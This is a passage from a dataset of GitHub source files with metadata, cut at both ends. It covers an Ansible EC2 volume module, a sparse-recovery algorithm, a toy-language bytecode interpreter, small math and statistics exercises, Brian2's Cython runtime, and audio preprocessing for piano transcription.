volume[\"size\"],\n 'snapshot_id': volume[\"snapshot_id\"],\n 'status': volume[\"state\"],\n 'type': volume[\"volume_type\"],\n 'zone': volume[\"availability_zone\"],\n 'region': region,\n 'attachment_set': {\n 'attach_time': attachment[0][\"attach_time\"] if len(attachment) > 0 else None,\n 'device': attachment[0][\"device\"] if len(attachment) > 0 else None,\n 'instance_id': attachment[0][\"instance_id\"] if len(attachment) > 0 else None,\n 'status': attachment[0][\"state\"] if len(attachment) > 0 else None,\n 'delete_on_termination': attachment[0][\"delete_on_termination\"] if len(attachment) > 0 else None\n },\n 'tags': boto3_tag_list_to_ansible_dict(volume['tags']) if \"tags\" in volume else None\n }\n\n return volume_info\n\n\ndef describe_volumes_with_backoff(connection, filters):\n paginator = connection.get_paginator('describe_volumes')\n return paginator.paginate(Filters=filters).build_full_result()\n\n\ndef list_ec2_volumes(connection, module, region):\n\n # Replace filter key underscores with dashes, for compatibility, except if we're dealing with tags\n sanitized_filters = module.params.get(\"filters\")\n for key in sanitized_filters:\n if not key.startswith(\"tag:\"):\n sanitized_filters[key.replace(\"_\", \"-\")] = sanitized_filters.pop(key)\n volume_dict_array = []\n\n try:\n all_volumes = describe_volumes_with_backoff(connection, 
ansible_dict_to_boto3_filter_list(sanitized_filters))\n\n except ClientError as e:\n module.fail_json(msg=e.response, exception=traceback.format_exc())\n\n for volume in all_volumes[\"Volumes\"]:\n volume = camel_dict_to_snake_dict(volume, ignore_list=['Tags'])\n volume_dict_array.append(get_volume_info(volume, region))\n module.exit_json(volumes=volume_dict_array)\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(\n dict(\n filters=dict(default=None, type='dict')\n )\n )\n\n module = AnsibleModule(argument_spec=argument_spec)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 required for this module')\n\n region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)\n\n connection = boto3_conn(\n module,\n conn_type='client',\n resource='ec2',\n region=region,\n endpoint=ec2_url,\n **aws_connect_params\n )\n\n list_ec2_volumes(connection, module, region)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2_vol_facts.py","file_name":"ec2_vol_facts.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"7336987354","text":"import numpy as np\n\n\ndef PIA_ASP(y, A, sp):\n set_prior = set()\n T, M, N = A.shape\n # M, N = A.shape\n KK = 8 # max iteration number\n R = {}\n set_pie = {}\n x_s = {}\n set_wan = {}\n set_out = {}\n x_out = {}\n set_s = {}\n x_wan = {}\n resid_array = []\n x_out_array = [[0] * N for _ in range(T)]\n for t in range(T): # T\n addtwodim(x_wan, t, 0, {})\n i = 1\n addtwodim(set_wan, t, i-1, set())\n addtwodim(set_pie, t, i-1, set())\n addtwodim(R, t, i-1, y[t])\n s = sp + 1\n # print(s)\n if t == 1:\n sp = 0\n resid_record = 0\n while i <= KK:\n # print(i)\n s_wan = sp - len(set_prior & set_pie[t][i-1])\n if s_wan >= 0:\n # print(A[t].T)\n # print(y[t])\n # print(np.dot(A[t].T, R[t][i-1]).reshape([N]))\n # print(R[t][i-1])\n # print(np.dot(A[t].T, R[t][i-1]).reshape([N])[list(set_prior)])\n pos = np.argsort(-abs(np.dot(A[t].T, R[t][i-1]).reshape([N])))[list(set_prior)]\n # matrix = np.dot(np.mat(A[t]).H, R[t][i-1])\n # pos = np.array(np.argsort(abs(np.dot(matrix, matrix.H)))[0])[0]\n # print(set_prior)\n # pos = np.argsort(-abs(np.dot(A[t].T, R[t][i-1]).reshape([N])[list(set_prior)]))\n # print(pos)\n gamma_a = set(pos[0:s_wan])\n # print('gamma', gamma_a)\n # gamma_a = set(np.argsort(-np.linalg.norm(np.dot(A[t].T, R[t][i-1])[:,list(set_prior)]))[0: s_wan])\n else:\n gamma_a = set()\n # print(\"gamma_a\")\n # print(gamma_a)\n matrix = np.array(np.dot(np.mat(A[t]).H, R[t][i - 1])).reshape([N])\n # print(matrix)\n for jjj in range(len(matrix)):\n matrix[jjj] = matrix[jjj] * matrix[jjj].conjugate()\n # print(matrix)\n pos = np.argsort(-abs(matrix))\n # print(pos)\n # pos = np.argsort(-abs(np.dot(A[t].T, R[t][i - 1])).reshape([N]))\n gamma_b = set(pos[0:s])\n # print(gamma_b)\n # print(\"gamma_b\")\n # print(gamma_b)\n gamma = set_pie[t][i-1] | gamma_a | gamma_b\n # print(gamma)\n # print(list(gamma))\n if len(gamma) <= M:\n # print(A.shape)\n At = A[t]\n At = At[:, list(gamma)]\n # print(At.shape)\n # print(\"At\")\n # print(At)\n else:\n break\n # print(At.shape)\n # print(list(gamma))\n W_g = np.dot(np.dot(np.linalg.inv(np.dot(At.T, At)), At.T), y[t])\n # print(gamma)\n # print(\"np.linalg.norm(y[t]-np.dot(At, W_g))\")\n # print(np.linalg.norm(y[t]-np.dot(At, W_g)))\n pos = np.argsort(-abs(W_g).reshape([len(gamma)]))[0:s]\n # print(pos)\n # print(s)\n # print(pos[0:s])\n # print(\"gamma\")\n # print(gamma)\n # print(pos)\n # print(set(np.array(list(gamma))[pos[0:s]]))\n addtwodim(set_wan, t, i, set(np.array(list(gamma))[pos[0:s]])) # support pruning\n # print(set_wan[t][i])\n\n # print(W_g)\n # print(gamma)\n # print(len(set_wan[t][i]))\n At = A[t]\n At = At[:, list(set_wan[t][i])]\n # print(At.shape)\n addtwodim(x_wan, t, i, np.dot(np.dot(np.linalg.inv(np.dot(At.T, At)), At.T), y[t]))\n resid = y[t] - np.dot(At, x_wan[t][i])\n addtwodim(R, t, i, resid)\n # print(np.linalg.norm(resid))\n if np.linalg.norm(R[t][i]) < np.linalg.norm(R[t][i-1]):\n addtwodim(set_pie, t, i, set_wan[t][i])\n x_s[t] = x_wan[t][i]\n set_s[t] = set_wan[t][i]\n i += 1\n else:\n x_s[t] = x_wan[t][i-1]\n set_s[t] = set_wan[t][i-1]\n s += 1\n\n if np.linalg.norm(resid) / np.linalg.norm(y[t]) < 1e-10:\n break\n # if np.linalg.norm(resid) / np.linalg.norm(y[t])< 1e-5:\n # # print(np.linalg.norm(resid))\n # resid_array.append(np.linalg.norm(resid))\n # set_out[t] = set_s[t]\n # x_out[t] = x_s[t]\n # set_prior = set_out[t]\n # # print(set_out[t])\n # for ii in range(len(set_out[t])):\n # x_out_array[t][list(set_out[t])[ii]] = x_out[t][ii][0]\n # # print(len(set_out[t]))\n # return 
x_out_array, resid_array\n\n resid_record = np.linalg.norm(resid)\n # print('resid',resid_record)\n resid_array.append(resid_record)\n # print(np.linalg.norm(resid))\n # print(len(set_s[t]))\n # print('=================')\n return x_out_array, resid_array\n\n\ndef addtwodim(dict, key_a, key_b, val):\n if key_a in dict:\n dict[key_a].update({key_b: val})\n else:\n dict.update({key_a: {key_b: val}})\n\n","repo_name":"ipangkang/IRS-","sub_path":"pia_asp.py","file_name":"pia_asp.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"74161859073","text":"import interpreter\n\n\nclass Frame:\n '''栈帧, 负责运行字节码'''\n # 运算符操作\n operator = {\n 'ADD': lambda a, b: a + b,\n 'SUB': lambda a, b: a - b,\n 'MUL': lambda a, b: a * b,\n 'DIV': lambda a, b: a / b,\n 'MOD': lambda a, b: a % b,\n 'AND': lambda a, b: a and b,\n 'OR': lambda a, b: a or b,\n 'RSHIFT': lambda a, b: a >> b,\n 'LSHIFT': lambda a, b: a << b,\n 'EQ': lambda a, b: a == b,\n 'NEQ': lambda a, b: a != b,\n 'LT': lambda a, b: a < b,\n 'LEQ': lambda a, b: a <= b,\n 'GT': lambda a, b: a > b,\n 'GEQ': lambda a, b: a >= b\n }\n IMPORT_PATH = 'Import'\n\n def __init__(self):\n self.globals = {} # 全局变量\n self.locals = {} # 局部变量\n self.callarg = {} # 函数参数\n self.stack = [] # 运行时栈\n self.exception = [] # 异常信息\n self.tryop = [] # 异常处理的位置\n\n def loadbuiltins(self):\n '''加载内置函数或模块'''\n import builtinframe, os\n self.globals['sys'] = builtinframe.builtin_sys\n self.globals['len'] = builtinframe.builtin_len\n self.globals['input'] = builtinframe.builtin_input\n self.globals['print'] = builtinframe.builtin_print\n self.globals['int'] = builtinframe.builtin_int\n self.globals['str'] = builtinframe.builtin_str\n self.globals['math'] = builtinframe.builtin_math\n self.globals['abs'] = builtinframe.builtin_abs\n self.globals['max'] = builtinframe.builtin_max\n self.globals['min'] = builtinframe.builtin_min\n self.globals['bin'] = builtinframe.builtin_bin\n self.globals['oct'] = builtinframe.builtin_oct\n self.globals['hex'] = builtinframe.builtin_hex\n self.globals['open'] = builtinframe.builtin_open\n self.globals['os'] = os\n\n def eval(self, bytecode):\n try:\n self.loadbuiltins()\n return self._eval(bytecode)\n except:\n # 输出异常\n print(\n f\"File {self.exception[1]['filename']}, Lineno {self.exception[1]['lineno']}, Linepos {self.exception[1]['linepos']}\")\n print(f\"\\t{self.exception[1]['line'][:-1].strip()}\")\n print(self.exception[0])\n\n def _eval(self, bytecode):\n op = 0\n nowarg = 0\n while op < len(bytecode.code):\n args = bytecode.code[op]\n try:\n if args[0] == 'LOAD_STRING':\n self.stack.append(args[1])\n elif args[0] == 'LOAD_NUM':\n self.stack.append(args[1])\n elif args[0] == 'LOAD_NAME':\n # 先找局部变量, 再找全局变量, 都找不到引发错误\n if args[1] in self.locals:\n self.stack.append(self.locals[args[1]])\n elif args[1] in self.globals:\n self.stack.append(self.globals[args[1]])\n else:\n raise NameError(f\"Name '{args[1]}' is not defined\")\n elif args[0] == 'STORE_NAME':\n self.locals[args[1]] = self.stack.pop()\n elif args[0] == 'LIST':\n l = []\n for i in range(args[1]):\n l.insert(0, self.stack.pop())\n self.stack.append(l)\n elif args[0] == 'PRINT':\n print(self.stack.pop(), end='')\n elif args[0] in self.operator:\n self.stack.append(self.operator[args[0]](self.stack.pop(), self.stack.pop()))\n elif args[0] == 'CMP': # args[0]是op的偏移量\n if not self.stack.pop():\n op += args[1]\n elif args[0] == 'JMP': # args[0]是op的偏移量\n op += args[1]\n elif args[0] == 'LOAD_INDEX':\n self.stack.append(self.stack.pop()[self.stack.pop()])\n elif args[0] == 'STORE_INDEX':\n l = self.stack.pop()\n index = self.stack.pop()\n val = self.stack.pop()\n l[index] = val\n elif args[0] == 'RETURN':\n return self.stack.pop()\n elif args[0] == 'FUNCTION':\n self.locals[args[1]] = bytecode.objects[args[1]]\n elif args[0] == 'CALL':\n argslen = args[1]\n func = self.stack.pop()\n callarg = []\n for i in range(argslen): # 加载参数\n callarg.insert(0, self.stack.pop())\n if type(func).__name__ == 'ByteCode':\n callframe = Frame()\n callframe.globals = dict(self.globals,**self.locals) # 
被调用函数的globals为调用方的globals和locals的合集\n callframe.callarg = callarg\n self.stack.append(callframe.eval(func))\n else: # 如果是内置函数\n self.stack.append(func(*callarg))\n elif args[0] == 'LOAD_ARG':\n self.locals[args[1]] = self.callarg[nowarg]\n nowarg += 1\n elif args[0] == 'INPUT':\n if args[1]:\n print(self.stack.pop(), end='')\n self.stack.append(input())\n elif args[0] == 'INT':\n self.stack.append(int(self.stack.pop()))\n elif args[0] == 'STR':\n self.stack.append(str(self.stack.pop()))\n elif args[0] == 'SET_TRY':\n self.tryop.append(op + args[1]) # 设置异常处理语句的位置\n elif args[0] == 'CLEAR_TRY':\n self.tryop = []\n elif args[0] == 'DICT':\n dictlen = args[1]\n d = {}\n for i in range(dictlen):\n key = self.stack.pop()\n val = self.stack.pop()\n d[key] = val\n self.stack.append(d)\n elif args[0] == 'CLASS':\n self.locals[args[1]] = bytecode.objects[args[1]]\n elif args[0] == 'RETURN_SELF':\n return self\n elif args[0] == 'LOAD_ATTR':\n name = self.stack.pop()\n if type(name).__name__ == 'Frame':\n self.stack.append(name.locals[args[1]])\n else:\n self.stack.append(getattr(name, args[1]))\n elif args[0] == 'STORE_ATTR':\n name = self.stack.pop()\n if type(name).__name__ == 'Frame':\n name.locals[args[1]] = self.stack.pop()\n elif args[0] == 'IMPORT':\n filename = args[1] + '.c--'\n inter = interpreter.Interpreter()\n try:\n # 先从程序路径找\n with open(f'{filename}', encoding='utf-8')as f:\n inter.interpret(f.read(), 'File', filename=filename)\n except:\n # 再从默认路径找\n with open(f'{self.IMPORT_PATH}\\\\{filename}', encoding='utf-8')as f:\n inter.interpret(f.read(), 'File', filename=filename)\n self.locals[args[1]] = inter.frame\n elif args[0] == 'LEN':\n self.stack.append(len(self.stack.pop()))\n elif args[0] == 'MERGE': # 合并\n self.locals = dict(self.locals,**self.stack.pop().locals)\n except Exception as e:\n self.exception = [type(e).__name__ + ': ' + str(e), args[-1]]\n if self.tryop: # 有对应的异常处理语句\n op = self.tryop[0]\n else:\n raise Exception\n op += 1\n","repo_name":"1604042736/c--","sub_path":"c--1.2/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31829918796","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-11 12:52\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : MinMaxValueSet : Print the minimum and maximum values from set \n'''\ndef min_max():\n \"\"\"\n Description:\n This Function print the minimum and maximum values from set\n Parameter:\n None\n Return:\n None\n \"\"\"\n try:\n #num Set\n num_set = set([11,2,30,4,59])\n print(\"Minimum Value : \",min(num_set))\n print(\"Maximum Value : \",max(num_set))\n \n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n min_max()","repo_name":"Pavan699/Data-Structures","sub_path":"Sets/MinMaxValueSet.py","file_name":"MinMaxValueSet.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21913059077","text":"from logging import CRITICAL\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nimport random\n'''\n\nnational = pd.DataFrame([\"white\"] * 100000 + [\"hispanic\"] * 60000 + \\\n [\"black\"] * 50000 + [\"asian\"] * 15000 + [\"other\"] * 35000)\n\nminnesota = pd.DataFrame([\"white\"] * 600 + [\"hispanic\"] * 300 + \\\n [\"black\"] * 250 + [\"asian\"] * 75 + [\"other\"] * 150)\n\nnational_table = pd.crosstab(index=national[0], columns=\"count\")\nminnesota_table = pd.crosstab(index=minnesota[0], columns=\"count\")\n\nprint(\"National\")\nprint(national_table)\nprint(\" \")\nprint(\"Minnesota\")\nprint(minnesota_table)\nobserved = minnesota_table\n\nnational_ratios = national_table/len(national) # Get population ratios\n\nexpected = national_ratios * len(minnesota) # Get expected counts\n\nchi_squared_stat = (((observed-expected)**2)/expected).sum()\n\nprint(chi_squared_stat)\ncrit = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*\n df = 4) # Df = number of variable categories - 1\n\nprint(\"Critical value\")\nprint(crit)\n\n# Find the p-value\np_value = 1 - stats.chi2.cdf(x=chi_squared_stat,df=4)\nprint(\"P value = \")\nprint(p_value)\nstats.chisquare(f_obs= observed, # Array of observed counts\n f_exp= expected)\n'''\n\n\nnoOfRandomNumber = int(input(\"Enter the number of random number: \"))\nalpha = float(input(\"Enter the value of alpha: \"))\ncritical = float(input(\"Enter the critical value of alpha: \"))\n\nrandomNumbers = []\nfor i in range(1,noOfRandomNumber+1):\n R = random.randint(1,100)\n randomNumbers.append(R)\n\nprint(\"{} {:^20} {:^20} {:^20} {:^20}\".format(\"Classes\", \"Count\", \"Frequency\", \"Diff\", \"Diff^2\"))\nclassp = 1\ncount = 0\nSofDiffS = 0\nfor i in range(10):\n classn = (i+1) * 10\n for i in range(noOfRandomNumber):\n if(randomNumbers[i]>classp and randomNumbers[i]<=classn):\n count = count + 1\n cou = '*' * count\n #Diff = frequency - (noOfRandomNumber/Classes)\n Diff = count-(noOfRandomNumber/10)\n DiffS = Diff*Diff\n SofDiffS = SofDiffS + DiffS\n print(\"{}-{} {:^25} {:^20} {:^20} {:^20}\".format(classp,classn, cou, count, Diff, DiffS))\n classp = classn\n count = 0\n\n\n\nprint(\"Chi-Square: {}/{} = {}\".format(SofDiffS,10,SofDiffS/10))\nChi_Square = SofDiffS/10\nif(critical>Chi_Square):\n print(\"Uniform\")\nelse: print(\"Not Uniform\")\n\n\n","repo_name":"Ayad-Mihidabi-Khan-Jitu/Workspace-Learning","sub_path":"LAB_CSE/LAB_SimulationAndModeling/Chi-square-test.py","file_name":"Chi-square-test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70220641155","text":"from sympy import sin, pi, exp, sqrt, symbols\n# --example--\n# print(sin(0))\n# >>> 0\n# -----------\n\n# n:分割数, l:区間下限, u:区間上限\ndef d(n=100, l=0, u=1):\n\n def a(l):\n return l\n\n def b(u):\n return u\n\n# 変数xを定義\n x = symbols(\"x\")\n\n# 台形積分\n h = (b(u) - a(l)) / n\n S = (h / 2) * (f.subs(x, a(l)) + 2 * sum(f.subs(x, a(l) + h * i) for i in range(1, n)) + f.subs(x, b(u))) \n\n return S\n\nx = symbols(\"x\")\n\n# (1)\nn = 50\nl = 0\nu = pi / 2\nf = sin(x)\n\nresult = d(n, l, u) \nprint(\"(1)\", float(result))\n\n# (2)\nn = 100\nl = 0\nu = 1\nf = 4 / (1 + x**2)\n\nresult = d(n, l, u) \nprint(\"(2)\", float(result))\n\n# (3)\nn = 1000\nl = -100\nu = 100\nf = sqrt(pi)*exp(-x**2)\n\nresult = d(n, l, u) \nprint(\"(3)\", float(result))","repo_name":"RyomaOhtani/Basic-Python","sub_path":"trapezoidal_integral.py","file_name":"trapezoidal_integral.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36823833984","text":"import platform\n\nimport numpy\n\nfrom brian2.core.base import BrianObjectException\nfrom brian2.core.functions import Function\nfrom brian2.core.preferences import BrianPreference, prefs\nfrom brian2.core.variables import (\n ArrayVariable,\n AuxiliaryVariable,\n DynamicArrayVariable,\n Subexpression,\n)\nfrom brian2.utils.logger import get_logger\nfrom brian2.utils.stringtools import get_identifiers\n\nfrom ...codeobject import check_compiler_kwds, constant_or_scalar\nfrom ...cpp_prefs import get_compiler_and_args\nfrom ...generators.cython_generator import (\n CythonCodeGenerator,\n get_cpp_dtype,\n get_numpy_dtype,\n)\nfrom ...targets import codegen_targets\nfrom ...templates import Templater\nfrom ..numpy_rt import NumpyCodeObject\nfrom .extension_manager import cython_extension_manager\n\n__all__ = [\"CythonCodeObject\"]\n\n\nlogger = get_logger(__name__)\n\n# Preferences\nprefs.register_preferences(\n \"codegen.runtime.cython\",\n \"Cython runtime codegen preferences\",\n multiprocess_safe=BrianPreference(\n default=True,\n docs=\"\"\"\n Whether to use a lock file to prevent simultaneous write access\n to cython .pyx and .so files.\n \"\"\",\n ),\n cache_dir=BrianPreference(\n default=None,\n validator=lambda x: x is None or isinstance(x, str),\n docs=\"\"\"\n Location of the cache directory for Cython files. By default,\n will be stored in a ``brian_extensions`` subdirectory\n where Cython inline stores its temporary files\n (the result of ``get_cython_cache_dir()``).\n \"\"\",\n ),\n delete_source_files=BrianPreference(\n default=True,\n docs=\"\"\"\n Whether to delete source files after compiling. The Cython\n source files can take a significant amount of disk space, and\n are not used anymore when the compiled library file exists.\n They are therefore deleted by default, but keeping them around\n can be useful for debugging.\n \"\"\",\n ),\n)\n\n\nclass CythonCodeObject(NumpyCodeObject):\n \"\"\"\n Execute code using Cython.\n \"\"\"\n\n templater = Templater(\n \"brian2.codegen.runtime.cython_rt\",\n \".pyx\",\n env_globals={\n \"cpp_dtype\": get_cpp_dtype,\n \"numpy_dtype\": get_numpy_dtype,\n \"dtype\": numpy.dtype,\n \"constant_or_scalar\": constant_or_scalar,\n },\n )\n generator_class = CythonCodeGenerator\n class_name = \"cython\"\n\n def __init__(\n self,\n owner,\n code,\n variables,\n variable_indices,\n template_name,\n template_source,\n compiler_kwds,\n name=\"cython_code_object*\",\n ):\n check_compiler_kwds(\n compiler_kwds,\n [\n \"libraries\",\n \"include_dirs\",\n \"library_dirs\",\n \"runtime_library_dirs\",\n \"sources\",\n ],\n \"Cython\",\n )\n super().__init__(\n owner,\n code,\n variables,\n variable_indices,\n template_name,\n template_source,\n compiler_kwds={}, # do not pass the actual args\n name=name,\n )\n self.compiler, self.extra_compile_args = get_compiler_and_args()\n self.define_macros = list(prefs[\"codegen.cpp.define_macros\"])\n self.extra_link_args = list(prefs[\"codegen.cpp.extra_link_args\"])\n self.headers = [] # not actually used\n\n self.include_dirs = list(prefs[\"codegen.cpp.include_dirs\"]) + compiler_kwds.get(\n \"include_dirs\", []\n )\n self.include_dirs = list(prefs[\"codegen.cpp.include_dirs\"])\n\n self.library_dirs = list(prefs[\"codegen.cpp.library_dirs\"]) + compiler_kwds.get(\n \"library_dirs\", []\n )\n\n self.runtime_library_dirs = list(\n prefs[\"codegen.cpp.runtime_library_dirs\"]\n ) + compiler_kwds.get(\"runtime_library_dirs\", [])\n\n self.libraries = 
list(prefs[\"codegen.cpp.libraries\"]) + compiler_kwds.get(\n \"libraries\", []\n )\n self.sources = compiler_kwds.get(\"sources\", [])\n\n @classmethod\n def is_available(cls):\n try:\n compiler, extra_compile_args = get_compiler_and_args()\n code = \"\"\"\n #cython: language_level=3\n def main():\n cdef int x\n x = 0\"\"\"\n compiled = cython_extension_manager.create_extension(\n code,\n compiler=compiler,\n extra_compile_args=extra_compile_args,\n extra_link_args=prefs[\"codegen.cpp.extra_link_args\"],\n include_dirs=prefs[\"codegen.cpp.include_dirs\"],\n library_dirs=prefs[\"codegen.cpp.library_dirs\"],\n runtime_library_dirs=prefs[\"codegen.cpp.runtime_library_dirs\"],\n )\n compiled.main()\n return True\n except Exception as ex:\n msg = (\n f\"Cannot use Cython, a test compilation failed: {str(ex)} \"\n f\"({ex.__class__.__name__})\"\n )\n if platform.system() != \"Windows\":\n msg += (\n \"\\nCertain compiler configurations (e.g. clang in a conda \"\n \"environment on OS X) are known to be problematic. Note that \"\n \"you can switch the compiler by setting the 'CC' and 'CXX' \"\n \"environment variables. For example, you may want to try \"\n \"'CC=gcc' and 'CXX=g++'.\"\n )\n logger.warn(msg, \"failed_compile_test\")\n return False\n\n def compile_block(self, block):\n code = getattr(self.code, block, \"\").strip()\n if not code or \"EMPTY_CODE_BLOCK\" in code:\n return None\n return cython_extension_manager.create_extension(\n code,\n define_macros=self.define_macros,\n libraries=self.libraries,\n extra_compile_args=self.extra_compile_args,\n extra_link_args=self.extra_link_args,\n include_dirs=self.include_dirs,\n library_dirs=self.library_dirs,\n runtime_library_dirs=self.runtime_library_dirs,\n compiler=self.compiler,\n owner_name=f\"{self.owner.name}_{self.template_name}\",\n sources=self.sources,\n )\n\n def run_block(self, block):\n compiled_code = self.compiled_code[block]\n if compiled_code:\n try:\n return compiled_code.main(self.namespace)\n except Exception as exc:\n message = (\n \"An exception occured during the execution of the \"\n f\"'{block}' block of code object '{self.name}'.\\n\"\n )\n raise BrianObjectException(message, self.owner) from exc\n\n def _insert_func_namespace(self, func):\n impl = func.implementations[self]\n func_namespace = impl.get_namespace(self.owner)\n if func_namespace is not None:\n self.namespace.update(func_namespace)\n if impl.dependencies is not None:\n for dep in impl.dependencies.values():\n self._insert_func_namespace(dep)\n\n def variables_to_namespace(self):\n # Variables can refer to values that are either constant (e.g. dt)\n # or change every timestep (e.g. t). 
We add the values of the\n # constant variables here and add the names of non-constant variables\n # to a list\n\n # A list containing tuples of name and a function giving the value\n self.nonconstant_values = []\n\n for name, var in self.variables.items():\n if isinstance(var, Function):\n self._insert_func_namespace(var)\n if isinstance(var, (AuxiliaryVariable, Subexpression)):\n continue\n try:\n value = var.get_value()\n except (TypeError, AttributeError):\n # A dummy Variable without value or a function\n self.namespace[name] = var\n continue\n\n if isinstance(var, ArrayVariable):\n self.namespace[self.device.get_array_name(var, self.variables)] = value\n self.namespace[f\"_num{name}\"] = var.get_len()\n if var.scalar and var.constant:\n self.namespace[name] = value.item()\n else:\n self.namespace[name] = value\n\n if isinstance(var, DynamicArrayVariable):\n dyn_array_name = self.generator_class.get_array_name(\n var, access_data=False\n )\n self.namespace[dyn_array_name] = self.device.get_value(\n var, access_data=False\n )\n\n # Also provide the Variable object itself in the namespace (can be\n # necessary for resize operations, for example)\n self.namespace[f\"_var_{name}\"] = var\n\n # Get all identifiers in the code -- note that this is not a smart\n # function, it will get identifiers from strings, comments, etc. This\n # is not a problem here, since we only use this list to filter out\n # things. If we include something incorrectly, this only means that we\n # will pass something into the namespace unnecessarily.\n all_identifiers = get_identifiers(self.code.run)\n # Filter out all unneeded objects\n self.namespace = {\n k: v for k, v in self.namespace.items() if k in all_identifiers\n }\n\n # There is one type of objects that we have to inject into the\n # namespace with their current value at each time step: dynamic\n # arrays that change in size during runs, where the size change is not\n # initiated by the template itself\n for name, var in self.variables.items():\n if isinstance(var, DynamicArrayVariable) and var.needs_reference_update:\n array_name = self.device.get_array_name(var, self.variables)\n if array_name in self.namespace:\n self.nonconstant_values.append((array_name, var.get_value))\n if f\"_num{name}\" in self.namespace:\n self.nonconstant_values.append((f\"_num{name}\", var.get_len))\n\n def update_namespace(self):\n # update the values of the non-constant values in the namespace\n for name, func in self.nonconstant_values:\n self.namespace[name] = func()\n\n\ncodegen_targets.add(CythonCodeObject)\n","repo_name":"brian-team/brian2","sub_path":"brian2/codegen/runtime/cython_rt/cython_rt.py","file_name":"cython_rt.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","stars":823,"dataset":"github-code","pt":"61"}
+{"seq_id":"39066271720","text":"from scipy.io import loadmat\nfrom scipy.io import savemat\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport glob\nimport madmom\nimport os\nimport configurations.preprocessing_parameters as ppp\nimport warnings\nfrom joblib import Parallel, delayed\nimport multiprocessing\nfrom madmom.io import midi\nfrom enum import Enum\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Fold(Enum):\n \"\"\"Distinguish the different folds the model is trained on.\"\"\"\n fold_1 = 0\n fold_2 = 1\n fold_3 = 2\n fold_4 = 3\n fold_benchmark = 4\n fold_single_note = 5\n\n\ndef wav_to_spec(base_dir, filename, _audio_options):\n \"\"\"Transforms the contents of a wav file into a series of spec frames.\"\"\"\n audio_filename = os.path.join(base_dir, filename + '.wav')\n\n spec_type, audio_options = get_spec_processor(_audio_options, madmom.audio.spectrogram)\n\n # it's necessary to cast this to np.array, b/c the madmom-class holds references to way too much memory\n spectrogram = np.array(spec_type(audio_filename, **audio_options))\n return spectrogram\n\n\ndef wav_to_hpcp(base_dir, filename):\n \"\"\"Transforms the contents of a wav file into a series of spec frames.\"\"\"\n audio_filename = os.path.join(base_dir, filename + '.wav')\n audio_options = ppp.get_hpcp_parameters()\n fmin = audio_options['fmin']\n fmax = audio_options['fmax']\n hpcp_processor = getattr(madmom.audio.chroma, 'HarmonicPitchClassProfile')\n audio_options['fmin'] = fmin[0]\n audio_options['fmax'] = fmax[0]\n hpcp = np.array(hpcp_processor(audio_filename, **audio_options))\n\n for index in range(1, 7):\n audio_options['fmin'] = fmin[index]\n audio_options['fmax'] = fmax[index]\n hpcp = np.append(hpcp, np.array(hpcp_processor(audio_filename, **audio_options)), axis=1)\n audio_options['fmin'] = fmin[-1]\n audio_options['fmax'] = fmax[-1]\n #audio_options['num_classes'] = 8\n hpcp = np.append(hpcp, np.array(hpcp_processor(audio_filename, **audio_options)[:, :int(audio_options['num_classes']/3)]), axis=1)\n # post-processing,\n # normalize hpcp by max value per frame. 
Add a small value to avoid division by zero\n #norm_vec = np.max(hpcp, axis=1) + 1e-7\n\n #hpcp = hpcp/norm_vec[:, None]\n hpcp = np.log10(hpcp + 1.0)\n hpcp = hpcp/np.max(hpcp)\n return hpcp\n\n\ndef get_spec_processor(_audio_options, madmom_spec):\n \"\"\"Returns the madmom spectrogram processor as defined in audio options.\"\"\"\n audio_options = dict(_audio_options)\n\n if 'spectrogram_type' in audio_options:\n spectype = getattr(madmom_spec, audio_options['spectrogram_type'])\n del audio_options['spectrogram_type']\n else:\n spectype = getattr(madmom_spec, 'LogarithmicFilteredSpectrogram')\n\n if 'filterbank' in audio_options:\n audio_options['filterbank'] = getattr(madmom_spec, audio_options['filterbank'])\n else:\n audio_options['filterbank'] = getattr(madmom_spec, 'LogarithmicFilterbank')\n\n return spectype, audio_options\n\n\ndef midi_to_groundtruth(base_dir, filename, dt, n_frames, is_chroma=False):\n \"\"\"Computes the frame-wise ground truth from a piano midi file, as a note or chroma vector.\"\"\"\n midi_filename = os.path.join(base_dir, filename + '.mid')\n notes = midi.load_midi(midi_filename)\n ground_truth = np.zeros((n_frames, 12 if is_chroma else 88)).astype(np.int64)\n for onset, _pitch, duration, velocity, _channel in notes:\n pitch = int(_pitch)\n frame_start = int(np.round(onset / dt))\n frame_end = int(np.round((onset + duration) / dt))\n label = np.mod(pitch - 21, 12) if is_chroma else pitch - 21\n ground_truth[frame_start:frame_end, label] = 1\n return ground_truth\n\n\ndef preprocess_fold(fold, mode, norm=False):\n \"\"\"Preprocess an entire fold as defined in the preprocessing parameters.\n fold - Fold.fold_1, Fold.fold_2, Fold.fold_3, Fold.fold_4, Fold.fold_benchmark\n mode - 'train', 'valid' or 'test' to address the correct config parameter\n \"\"\"\n config = ppp.get_preprocessing_parameters(fold.value)\n audio_config = config['audio_config']\n\n # load fold\n filenames = 